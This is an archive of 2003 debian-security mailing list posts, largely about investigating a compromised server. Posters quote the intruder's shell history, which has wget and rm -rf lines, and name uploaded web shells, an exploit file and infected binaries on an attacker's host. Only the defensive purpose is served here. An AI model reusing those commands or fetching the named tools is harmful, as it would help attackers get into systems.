Re: Strange segmentation faults and Zombies

2003-09-18 Thread Michel Messerschmidt 
On Thu, Sep 18, 2003 at 07:20:08PM +0200, Javier Fernández-Sanguino Peña wrote:
> > www.slacks.hpg.ig.com.br/bin/rh  Infection: Unix/Osf.A
> 
> This is an exploit to an OpenSSL bug.
> 
> > www.slacks.hpg.ig.com.br/bin/mass  Infection: Unix/Osf.A
> 
> This is a 'massive' scanner
> 
> > www.slacks.hpg.ig.com.br/bin/co1  Infection: Unix/Osf.A
> 
> This is another OpenSSL exploit (written in Portuguese)
> 
> > www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/makesalt  Infection: 
> > Unix/Osf.A
> > www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/psybnc  Infection: 
> > Unix/Osf.A 
> 
> Both of these are programs to setup IRC daemons and relays IIRC. See:
> http://www.honeynet.org/scans/scan28/
> 
> > 
> > But AFAIK none of these viruses is able to get root rights, so the attacker 
> > must have got root rights before.
> 
> Well, they are not virus themselves. The fact that f-prot labels them as
> such is that they usually are part of some massrooter, worm or trojan, but
> they can be (and are) used independently.

Be careful!
These files are really infected and will infect other ELF binaries if
you execute them (and if user rights allow it). 
I've done replication tests for all of them to confirm this.

Michel


PS: Non-viral malware is usally reported differently by f-prot 
(eg. as "is a security risk or a backdoor program")
-- 
Michel Messerschmidt   [EMAIL PROTECTED]
antiVirusTestCenter, Computer Science, University of Hamburg


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Sendmail package version weirdness

2003-09-18 Thread Matt Zimmerman 
On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:

> Was there any particular reason that this newer fixed version has a
> version number the makes it look older than the exploitable version?

Simple: it doesn't.  The version in stable is 8.12.3-4, and the version on
security.debian.org is 8.12.3-6.6.  Your package came from someplace else.

-- 
 - mdz

Re: Remote update of ssh(d)

2003-09-18 Thread Matt Zimmerman 
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
> In article <[EMAIL PROTECTED]> you wrote:
> > I found the problem: The file /var/run/sshd.pid was missing.
> 
> Well, this raises the question, since failed restarts of daemons are quite
> common because there are simply too much errors which can happen, if we
> should add kind of post-update stale-executable checker, means a program
> which will lsit all running programs with no file on disk and especially
> those with listening ports. i think even tiger does not have that check.
> 
> Checksecurity and tiger can do this, apt could call also a script, especialy
> after security updates.

apt-get install debian-goodies && checkrestart

-- 
 - mdz

Re: Sendmail package version weirdness

2003-09-18 Thread Jeremy T. Bouse 
On Fri, Sep 19, 2003 at 01:47:28AM -0400, Robert Brockway wrote:
> On Fri, 19 Sep 2003, Matt Zimmerman wrote:
> 
> > On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:
> >
> > > Was there any particular reason that this newer fixed version has a
> > > version number the makes it look older than the exploitable version?
> >
> > Simple: it doesn't.  The version in stable is 8.12.3-4, and the version on
> > security.debian.org is 8.12.3-6.6.  Your package came from someplace else.
> 
> Hi Matt.  Thanks for clearing that up.  FYI I located the origin of the
> version I was using:
> 
> http://people.debian.org/~cowboy/sendmail_8.12.3-7woody_i386.changes
> 
Just like anyone using debian.seabone.net for the debian-ipv6
repository for woody would have 8.12.9-3 installed... 

Regards,
Jeremy

> Rob
> 
> -- 
> Robert Brockway B.Sc. email: [EMAIL PROTECTED], [EMAIL PROTECTED]
> Linux counter project ID #16440 (http://counter.li.org)
> "The earth is but one country and mankind its citizens" -Baha'u'llah
> 
> 
> -- 
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> 


signature.asc
Description: Digital signature

Re: Sendmail package version weirdness

2003-09-18 Thread Robert Brockway 
On Fri, 19 Sep 2003, Matt Zimmerman wrote:

> On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:
>
> > Was there any particular reason that this newer fixed version has a
> > version number the makes it look older than the exploitable version?
>
> Simple: it doesn't.  The version in stable is 8.12.3-4, and the version on
> security.debian.org is 8.12.3-6.6.  Your package came from someplace else.

Hi Matt.  Thanks for clearing that up.  FYI I located the origin of the
version I was using:

http://people.debian.org/~cowboy/sendmail_8.12.3-7woody_i386.changes

Rob

-- 
Robert Brockway B.Sc. email: [EMAIL PROTECTED], [EMAIL PROTECTED]
Linux counter project ID #16440 (http://counter.li.org)
"The earth is but one country and mankind its citizens" -Baha'u'llah


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Sendmail package version weirdness

2003-09-18 Thread Robert Brockway 
Hi all.  I took preventative measures to protect my exploitable sendmail
until I could get the new package installed on my mail server (running
Debian Stable).  I did the usual sudo apt-get update && sudo apt-get
upgrade but wasn't seeing the new package.

A little bit of investigation showed the problem.  The version I was
running (exploitable) was 8.12.3-7woody so when I tried to upgrade to the
newer fixed version (8.12.3-6.6) it ways always seeing this as an older
version & failing to install it.

Was there any particular reason that this newer fixed version has a
version number the makes it look older than the exploitable version?
Surely this will make life harder for people wanting to upgrade since the
normal apt0-get method will fail.  Was it just a mjessup with version
numbering? :)  If it was I'd suggest the fixed sendmail be re-issued with
a higher version number to fix the problem.

Thanks again, must have been a busy few days for you :)

Cheers,
Rob

-- 
Robert Brockway B.Sc. email: [EMAIL PROTECTED], [EMAIL PROTECTED]
Linux counter project ID #16440 (http://counter.li.org)
"The earth is but one country and mankind its citizens" -Baha'u'llah

Re: Sendmail package version weirdness

2003-09-18 Thread Matt Zimmerman 
On Thu, Sep 18, 2003 at 10:58:49PM -0400, Robert Brockway wrote:

> Was there any particular reason that this newer fixed version has a
> version number the makes it look older than the exploitable version?

Simple: it doesn't.  The version in stable is 8.12.3-4, and the version on
security.debian.org is 8.12.3-6.6.  Your package came from someplace else.

-- 
 - mdz


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Remote update of ssh(d)

2003-09-18 Thread Matt Zimmerman 
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
> In article <[EMAIL PROTECTED]> you wrote:
> > I found the problem: The file /var/run/sshd.pid was missing.
> 
> Well, this raises the question, since failed restarts of daemons are quite
> common because there are simply too much errors which can happen, if we
> should add kind of post-update stale-executable checker, means a program
> which will lsit all running programs with no file on disk and especially
> those with listening ports. i think even tiger does not have that check.
> 
> Checksecurity and tiger can do this, apt could call also a script, especialy
> after security updates.

apt-get install debian-goodies && checkrestart

-- 
 - mdz


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Sendmail package version weirdness

2003-09-18 Thread Robert Brockway 
Hi all.  I took preventative measures to protect my exploitable sendmail
until I could get the new package installed on my mail server (running
Debian Stable).  I did the usual sudo apt-get update && sudo apt-get
upgrade but wasn't seeing the new package.

A little bit of investigation showed the problem.  The version I was
running (exploitable) was 8.12.3-7woody so when I tried to upgrade to the
newer fixed version (8.12.3-6.6) it ways always seeing this as an older
version & failing to install it.

Was there any particular reason that this newer fixed version has a
version number the makes it look older than the exploitable version?
Surely this will make life harder for people wanting to upgrade since the
normal apt0-get method will fail.  Was it just a mjessup with version
numbering? :)  If it was I'd suggest the fixed sendmail be re-issued with
a higher version number to fix the problem.

Thanks again, must have been a busy few days for you :)

Cheers,
Rob

-- 
Robert Brockway B.Sc. email: [EMAIL PROTECTED], [EMAIL PROTECTED]
Linux counter project ID #16440 (http://counter.li.org)
"The earth is but one country and mankind its citizens" -Baha'u'llah


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: ***DEB*: Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread ICTO-Balie 



rm -rf phpshell.php



  ^__^
was this the exploited hole ?



I think so. In fact the problem is that it got there...


probably uploaded somehow...
a upload-form, some web-script maybe?

check php permissions i'd say.
where was enr php-file located? do you know?

good luck, Jst.

Tiger (was: Remote update of ssh(d))

2003-09-18 Thread Bernd Eckenfels 
In article <[EMAIL PROTECTED]> you wrote:
> Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it 
> after reading an excelent article by Brian Hatch on this precise issue.

Just a minor note, i think tiger is getting better and better, i realy start
to love it. Especially since it is pretty leightweight and never the less
produces good and important reports.

> It's available in 3.2 but was not added to the cronrc file due to an
> oversight. That is fixed in 3.2.1 (but I have not found time to make new
> packages for it yet, sorry)

Thanks for your work on that... and expect some more bug reports from me :)

Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/

Re: ***DEB*: Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread ICTO-Balie 

rm -rf phpshell.php


  ^__^
was this the exploited hole ?


I think so. In fact the problem is that it got there...
probably uploaded somehow...
a upload-form, some web-script maybe?
check php permissions i'd say.
where was enr php-file located? do you know?
good luck, Jst.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Tiger (was: Remote update of ssh(d))

2003-09-18 Thread Bernd Eckenfels 
In article <[EMAIL PROTECTED]> you wrote:
> Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it 
> after reading an excelent article by Brian Hatch on this precise issue.

Just a minor note, i think tiger is getting better and better, i realy start
to love it. Especially since it is pretty leightweight and never the less
produces good and important reports.

> It's available in 3.2 but was not added to the cronrc file due to an
> oversight. That is fixed in 3.2.1 (but I have not found time to make new
> packages for it yet, sorry)

Thanks for your work on that... and expect some more bug reports from me :)

Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Remote update of ssh(d)

2003-09-18 Thread Javier Fernández-Sanguino Peña 
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
> In article <[EMAIL PROTECTED]> you wrote:
> > I found the problem: The file /var/run/sshd.pid was missing.
> 
> Well, this raises the question, since failed restarts of daemons are quite
> common because there are simply too much errors which can happen, if we
> should add kind of post-update stale-executable checker, means a program
> which will lsit all running programs with no file on disk and especially
> those with listening ports. i think even tiger does not have that check.

Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it 
after reading an excelent article by Brian Hatch on this precise issue.

It's available in 3.2 but was not added to the cronrc file due to an
oversight. That is fixed in 3.2.1 (but I have not found time to make new
packages for it yet, sorry)

Regards

Javi


pgpajLCOL4CjN.pgp
Description: PGP signature

Re: Remote update of ssh(d)

2003-09-18 Thread Bernd Eckenfels 
In article <[EMAIL PROTECTED]> you wrote:
> I found the problem: The file /var/run/sshd.pid was missing.

Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too much errors which can happen, if we
should add kind of post-update stale-executable checker, means a program
which will lsit all running programs with no file on disk and especially
those with listening ports. i think even tiger does not have that check.

Checksecurity and tiger can do this, apt could call also a script, especialy
after security updates.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/

Re: Remote update of ssh(d)

2003-09-18 Thread Javier Fernández-Sanguino Peña 
On Thu, Sep 18, 2003 at 09:12:45PM +0200, Bernd Eckenfels wrote:
> In article <[EMAIL PROTECTED]> you wrote:
> > I found the problem: The file /var/run/sshd.pid was missing.
> 
> Well, this raises the question, since failed restarts of daemons are quite
> common because there are simply too much errors which can happen, if we
> should add kind of post-update stale-executable checker, means a program
> which will lsit all running programs with no file on disk and especially
> those with listening ports. i think even tiger does not have that check.

Ummm... Tiger does have it, it's called 'check_finddeleted'. I wrote it 
after reading an excelent article by Brian Hatch on this precise issue.

It's available in 3.2 but was not added to the cronrc file due to an
oversight. That is fixed in 3.2.1 (but I have not found time to make new
packages for it yet, sorry)

Regards

Javi


pgp0.pgp
Description: PGP signature

Re: Remote update of ssh(d)

2003-09-18 Thread Bernd Eckenfels 
In article <[EMAIL PROTECTED]> you wrote:
> I found the problem: The file /var/run/sshd.pid was missing.

Well, this raises the question, since failed restarts of daemons are quite
common because there are simply too much errors which can happen, if we
should add kind of post-update stale-executable checker, means a program
which will lsit all running programs with no file on disk and especially
those with listening ports. i think even tiger does not have that check.

Checksecurity and tiger can do this, apt could call also a script, especialy
after security updates.

Greetings
Bernd
-- 
eckes privat - http://www.eckes.org/
Project Freefire - http://www.freefire.org/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Javier Fernández-Sanguino Peña 
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
> 
> Might be a side effect of the tools that were used.
> A quick scan with f-prot shows several infected files on the server 
> www.slacks.hpg.ig.com.br: 
()
> www.slacks.hpg.ig.com.br/bin/rh  Infection: Unix/Osf.A

This is an exploit to an OpenSSL bug.

> www.slacks.hpg.ig.com.br/bin/mass  Infection: Unix/Osf.A

This is a 'massive' scanner

> www.slacks.hpg.ig.com.br/bin/co1  Infection: Unix/Osf.A

This is another OpenSSL exploit (written in Portuguese)

> www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/makesalt  Infection: 
> Unix/Osf.A
> www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/psybnc  Infection: 
> Unix/Osf.A 

Both of these are programs to setup IRC daemons and relays IIRC. See:
http://www.honeynet.org/scans/scan28/

> 
> But AFAIK none of these viruses is able to get root rights, so the attacker 
> must have got root rights before.

Well, they are not virus themselves. The fact that f-prot labels them as
such is that they usually are part of some massrooter, worm or trojan, but
they can be (and are) used independently.

Regards

Javi


pgp2fv53ITg9y.pgp
Description: PGP signature

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Michel Messerschmidt 

Diego Brouard schreibt:

As you've seen you have been cracked by a "worm", it's called
RST.b. 

In few words, it infect exectable files in /bin and in the current directory 
from where you are executing an already infected binary. You were infected

because of a php bug and the ptrace bug.


Might be a side effect of the tools that were used.
A quick scan with f-prot shows several infected files on the server 
www.slacks.hpg.ig.com.br: 


www.slacks.hpg.ig.com.br/bin/telnetd  Infection: Unix/RST.B
www.slacks.hpg.ig.com.br/bin/sslscan  Infection: Unix/RST.B
www.slacks.hpg.ig.com.br/bin/rh  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/bin/mass  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/bin/co1  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/makesalt  Infection: 
Unix/Osf.A
www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/psybnc  Infection: 
Unix/Osf.A 

But AFAIK none of these viruses is able to get root rights, so the attacker 
must have got root rights before.

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Andrew Sayers 
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
> 
> i'm thinking about a hardware problem. 
> may the harddrive is in failure (get the ouput of dmesg) or a very big
> ram problem that corrupt files on the hard drive.

By the sound of things, this is starting to sound more like an exploit,
but you might be interested to know that broken hard disks can often be
detected with SMART.  You can use "ide-smart" with stable or
"smartmontools" with testing/unstable to get information about
SMART-enabled disk drives.  Then again, if you suspect tampering or
hardware failure, you should overreact first (copy the data out to
another system) and analyse later.

- Andrew

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Diego Brouard 
El Miércoles, 17 de Septiembre de 2003 21:29, Markus Schabel escribió:
> Hello!
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but it also crashed. Interesting was that the executable was bigger
> after the segfault.

As you've seen you have been cracked by a "worm", it's called
RST.b.

In few words, it infect exectable files in /bin and in the current directory 
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.

There are lots of info "googling" internet. You can avoid reinstall the server 
if you work carefully.

good luck


-- 


Red JABBER   www.jabber.org

JID [EMAIL PROTECTED]

Postfix and SSL

2003-09-18 Thread Konstantin 
hi,

I want to setup postfix with SSL.

On the Inet I found only tutorials with postfix v2.0
Stable use postfix v1.1 and I couldn't find any information about posfix
1.1 and SSL


thx for help

Konstantin

RE: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch 
>> - perl without tainting checks in cgi-bin?
>
>what exactly do you mean? how can i do/check that?
>

use '#!/usr/local/bin/perl -T' at the beginning of a perl cgi.

Probably it would end in some 'tainted' errors you have to solve.
For further details look into 'man perlsec'.

Christian

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Matt Zimmerman 
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:

> Christian Storch wrote:
> >- security updates all up to date?
> 
> the same state as DSA announcements

Including your kernel?

> >- known unclosed security hole?
> 
> It seems that it was possible to upload & execute .php-files somewhere
> (phpshell.php)

Yes, this would appear to be how they got a shell, but not root (which they
clearly had also).

-- 
 - mdz

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Matt Zimmerman 
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:

> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
> 
> so we got hacked :(

You must not allow users to upload files to locations where they can be
executed as programs by the web server (such as PHP, CGI, etc.).  This
configuration is easily abused to gain arbitrary access to the system.

I'd be interested in finding out how they got from www-data to root, though
(assuming your system is up-to-date with security updates).

-- 
 - mdz

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Javier Fernández-Sanguino Peña 
On Thu, Sep 18, 2003 at 07:02:06PM +0200, Michel Messerschmidt wrote:
> 
> Might be a side effect of the tools that were used.
> A quick scan with f-prot shows several infected files on the server 
> www.slacks.hpg.ig.com.br: 
()
> www.slacks.hpg.ig.com.br/bin/rh  Infection: Unix/Osf.A

This is an exploit to an OpenSSL bug.

> www.slacks.hpg.ig.com.br/bin/mass  Infection: Unix/Osf.A

This is a 'massive' scanner

> www.slacks.hpg.ig.com.br/bin/co1  Infection: Unix/Osf.A

This is another OpenSSL exploit (written in Portuguese)

> www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/makesalt  Infection: 
> Unix/Osf.A
> www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/psybnc  Infection: 
> Unix/Osf.A 

Both of these are programs to setup IRC daemons and relays IIRC. See:
http://www.honeynet.org/scans/scan28/

> 
> But AFAIK none of these viruses is able to get root rights, so the attacker 
> must have got root rights before.

Well, they are not virus themselves. The fact that f-prot labels them as
such is that they usually are part of some massrooter, worm or trojan, but
they can be (and are) used independently.

Regards

Javi


pgp0.pgp
Description: PGP signature

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Michel Messerschmidt 
Diego Brouard schreibt:
As you've seen you have been cracked by a "worm", it's called
RST.b. 

In few words, it infect exectable files in /bin and in the current directory 
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.
Might be a side effect of the tools that were used.
A quick scan with f-prot shows several infected files on the server 
www.slacks.hpg.ig.com.br: 

www.slacks.hpg.ig.com.br/bin/telnetd  Infection: Unix/RST.B
www.slacks.hpg.ig.com.br/bin/sslscan  Infection: Unix/RST.B
www.slacks.hpg.ig.com.br/bin/rh  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/bin/mass  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/bin/co1  Infection: Unix/Osf.A
www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/makesalt  Infection: 
Unix/Osf.A
www.slacks.hpg.ig.com.br/psyBNC.tar.gz->?->psybnc/psybnc  Infection: 
Unix/Osf.A 

But AFAIK none of these viruses is able to get root rights, so the attacker 
must have got root rights before.

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Stefan Neufeind 
On 18 Sep 2003 at 15:02, Markus Schabel wrote:

> Christian Storch wrote:
> > The problem is starting >>before<<
> 
> I think all the things >>before<< phpshell.php are done via
> phpshell.php and the things you can see in the .bash_history
> are only the things after he already got in.
> 
[...]
> > - known unclosed security hole?
> 
> It seems that it was possible to upload & execute .php-files somewhere
> (phpshell.php)

Maybe a directory-traversal-thing when using a certain form provided 
on a webpage to upload files? Check your scripts. It's quite easy to 
open such security holes - be careful with fileuploads.

   Stefan

> > -Original Message-
> > From: Markus Schabel [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, September 18, 2003 12:23 PM
> > To: debian-security@lists.debian.org
> > Subject: Re: [sec] Re: Strange segmentation faults and Zombies
> > 
> > maximilian attems wrote:
> > 
> >>On Thu, 18 Sep 2003, Christian Storch wrote:
> >>
> >>
> >>
> >>>Don't forget to try to find the potential hole first!
> >>>Otherwise you could have a fast recurrence.
> >>>[..]
> >>>
> >>>
> >in /etc/.rpn theres a .bash_history with the following content:
> >
> >
> >>id
> >>mkdir /etc/.rpn
> >>ps -aux
> >>ps -aux | grep tbk
> >>kill -15292 pid
> >>kill 15292
> >>netconf
> >>locate httpd.conf
> >>cd /etc/.rpn
> >>ls -al
> >>wget
> >>cd /var/www/cncmap/www/upload/renegade
> >>ls -al
> >>rm -rf phpshell.php
> >>
> >>  ^__^
> >>was this the exploited hole ?
> > 
> > 
> > I think so. In fact the problem is that it got there...

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Andrew Sayers 
On Wed, Sep 17, 2003 at 11:52:36PM +0200, Laurent Corbes {Caf'} wrote:
> 
> i'm thinking about a hardware problem. 
> may the harddrive is in failure (get the ouput of dmesg) or a very big
> ram problem that corrupt files on the hard drive.

By the sound of things, this is starting to sound more like an exploit,
but you might be interested to know that broken hard disks can often be
detected with SMART.  You can use "ide-smart" with stable or
"smartmontools" with testing/unstable to get information about
SMART-enabled disk drives.  Then again, if you suspect tampering or
hardware failure, you should overreact first (copy the data out to
another system) and analyse later.

- Andrew



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Diego Brouard 
El Miércoles, 17 de Septiembre de 2003 21:29, Markus Schabel escribió:
> Hello!
>
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaultet.
> I've copied gzip from another server over the version on this server,
> but it also crashed. Interesting was that the executable was bigger
> after the segfault.

As you've seen you have been cracked by a "worm", it's called
RST.b.

In few words, it infect exectable files in /bin and in the current directory 
from where you are executing an already infected binary. You were infected
because of a php bug and the ptrace bug.

There are lots of info "googling" internet. You can avoid reinstall the server 
if you work carefully.

good luck


-- 


Red JABBER   www.jabber.org

JID [EMAIL PROTECTED]


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Postfix and SSL

2003-09-18 Thread Konstantin 
hi,

I want to setup postfix with SSL.

On the Inet I found only tutorials with postfix v2.0
Stable use postfix v1.1 and I couldn't find any information about posfix
1.1 and SSL


thx for help

Konstantin




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

RE: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch 
>> - perl without tainting checks in cgi-bin?
>
>what exactly do you mean? how can i do/check that?
>

use '#!/usr/local/bin/perl -T' at the beginning of a perl cgi.

Probably it would end in some 'tainted' errors you have to solve.
For further details look into 'man perlsec'.

Christian


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Matt Zimmerman 
On Thu, Sep 18, 2003 at 03:02:04PM +0200, Markus Schabel wrote:

> Christian Storch wrote:
> >- security updates all up to date?
> 
> the same state as DSA announcements

Including your kernel?

> >- known unclosed security hole?
> 
> It seems that it was possible to upload & execute .php-files somewhere
> (phpshell.php)

Yes, this would appear to be how they got a shell, but not root (which they
clearly had also).

-- 
 - mdz


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Matt Zimmerman 
On Thu, Sep 18, 2003 at 09:03:12AM +0200, Markus Schabel wrote:

> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
> 
> so we got hacked :(

You must not allow users to upload files to locations where they can be
executed as programs by the web server (such as PHP, CGI, etc.).  This
configuration is easily abused to gain arbitrary access to the system.

I'd be interested in finding out how they got from www-data to root, though
(assuming your system is up-to-date with security updates).

-- 
 - mdz


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 

Christian Storch wrote:

The problem is starting >>before<<


I think all the things >>before<< phpshell.php are done via
phpshell.php and the things you can see in the .bash_history
are only the things after he already got in.


id
mkdir /etc/.rpn
...

you should think about all what's listening on a port:
- an outdated sshd? (!)


It was a NOW outdated sshd but I believe that the new packages weren't
availiable on sunday - after getting the DSA-mails i usually update my
systems.


- security updates all up to date?


the same state as DSA announcements


- known unclosed security hole?


It seems that it was possible to upload & execute .php-files somewhere
(phpshell.php)


- some nice scripts like 'rootshell.php'? ;)


no. at least not found till now.


- perl without tainting checks in cgi-bin?


what exactly do you mean? how can i do/check that?

thanks, markus


etc.
etc.

Christian


-Original Message-
From: Markus Schabel [mailto:[EMAIL PROTECTED]
Sent: Thursday, September 18, 2003 12:23 PM
To: debian-security@lists.debian.org
Subject: Re: [sec] Re: Strange segmentation faults and Zombies

maximilian attems wrote:


On Thu, 18 Sep 2003, Christian Storch wrote:




Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.
[..]



in /etc/.rpn theres a .bash_history with the following content:



id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php


  ^__^
was this the exploited hole ?



I think so. In fact the problem is that it got there...

regards
Markus

Re: [sec] Re: Strange segmentation faults and Zombies

2003-09-18 Thread Stefan Neufeind 
On 18 Sep 2003 at 15:02, Markus Schabel wrote:

> Christian Storch wrote:
> > The problem is starting >>before<<
> 
> I think all the things >>before<< phpshell.php are done via
> phpshell.php and the things you can see in the .bash_history
> are only the things after he already got in.
> 
[...]
> > - known unclosed security hole?
> 
> It seems that it was possible to upload & execute .php-files somewhere
> (phpshell.php)

Maybe a directory-traversal-thing when using a certain form provided 
on a webpage to upload files? Check your scripts. It's quite easy to 
open such security holes - be careful with fileuploads.

   Stefan

> > -Original Message-
> > From: Markus Schabel [mailto:[EMAIL PROTECTED]
> > Sent: Thursday, September 18, 2003 12:23 PM
> > To: [EMAIL PROTECTED]
> > Subject: Re: [sec] Re: Strange segmentation faults and Zombies
> > 
> > maximilian attems wrote:
> > 
> >>On Thu, 18 Sep 2003, Christian Storch wrote:
> >>
> >>
> >>
> >>>Don't forget to try to find the potential hole first!
> >>>Otherwise you could have a fast recurrence.
> >>>[..]
> >>>
> >>>
> >in /etc/.rpn theres a .bash_history with the following content:
> >
> >
> >>id
> >>mkdir /etc/.rpn
> >>ps -aux
> >>ps -aux | grep tbk
> >>kill -15292 pid
> >>kill 15292
> >>netconf
> >>locate httpd.conf
> >>cd /etc/.rpn
> >>ls -al
> >>wget
> >>cd /var/www/cncmap/www/upload/renegade
> >>ls -al
> >>rm -rf phpshell.php
> >>
> >>  ^__^
> >>was this the exploited hole ?
> > 
> > 
> > I think so. In fact the problem is that it got there...


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel 

Phillip Hofmeister wrote:

On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:


scp goodserver:/bin/gzip /bin/gzip


NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.



scp from the clean system into the dirty one.  This way he won't get
access to the clean systems because the passwd for the clean system will
not be given to the dirty one.


In fact that was what I tried to explain with "copied from the other
server via scp." and already done a lot of times...

thanks
Markus

Re: Strange segmentation faults and Zombies

2003-09-18 Thread Phillip Hofmeister 
On Thu, 18 Sep 2003 at 09:08:28AM +0200, Markus Schabel wrote:
> >scp goodserver:/bin/gzip /bin/gzip
> NO! Since there's the chance that the server got hacked I'm not
> interested to give him other passwords. copied from the other server
> via scp.

scp from the clean system into the dirty one.  This way he won't get
access to the clean systems because the passwd for the clean system will
not be given to the dirty one.

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import
--
Excuse #145: Short leg on process table

